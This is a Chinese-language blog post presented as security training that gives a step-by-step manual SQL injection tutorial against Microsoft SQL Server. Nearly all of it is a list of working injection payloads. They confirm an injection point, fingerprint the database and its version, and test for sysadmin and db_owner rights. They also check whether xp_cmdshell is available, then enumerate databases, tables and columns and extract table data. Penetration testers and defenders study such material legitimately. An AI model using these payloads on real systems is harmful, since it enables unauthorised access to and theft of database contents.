• 置顶文章
  • 最新文章
  • 热门文章
  • 随机文章

Mssql手工注入教程 热门文章

时间:2016-2-16   作者:sunghost   分类: 网络安全培训   浏览:2154   编辑   评论:13
时间:2016-2-16   分类: 网络安全培训    浏览:2154  
mssql端口1433
1、判断是否有注入
and 1=1
and 1=2
2、初步判断是否是mssql
and user>0
and exists (select * from sysobjects) //判断是否是MSSQL
3、判断数据库系统
and (select count(*) from sysobjects)>0 mssql
and (select count(*) from msysobjects)>0 access
and 1=(select @@version) 报版本信息
and 1=(select @@VERSION) //MSSQL版本
and 1=(select db_name()) 报数据库名
and 1=(select @@servername) //本地服务名
4、猜解表名
and (select count(*) from [表名])>0
and exists(select * from [表名]) //猜解表名
5、猜解字段名
and (select count([字段名]) from [表名])>0
6、测试权限结构
and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- //判断是否是系统管理员
and 1=(select IS_SRVROLEMEMBER('db_owner'));-- //判断是否是库权限
and 1=(select IS_SRVROLEMEMBER('pulic'));-- //判断是否是public权限
and 1=(Select IS_MEMBER('db_owner'));-- //判断是否是库权限
and 1= (Select HAS_DBACCESS('master'));-- //判断是否有库读取权限
and 1=convert(int,db_name())或1=(select db_name()) //当前数据库名
and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3....
;declare @d int //是否支持多行
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除
7、获取用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4) 获取第一个用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'数据库名') //获取第二个用户数据库
and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'数据库名' and name<>'数据库名') //获取第三个用户数据库
8、获取表名
and 1=(select top 1 name from sysobjects where xtype='u')//获取第一张表
and 1=(select top 1 name from sysobjects where xtype='U' and name <> '[表名]')//获取第二张表
9、获取列名
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'user'))//获取user表的列名
and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'user')) and name <> 'uname' //获取user表的列名
10、获取表数据
and 1=(select top 1 [列名] from [表名])

阅读全文>>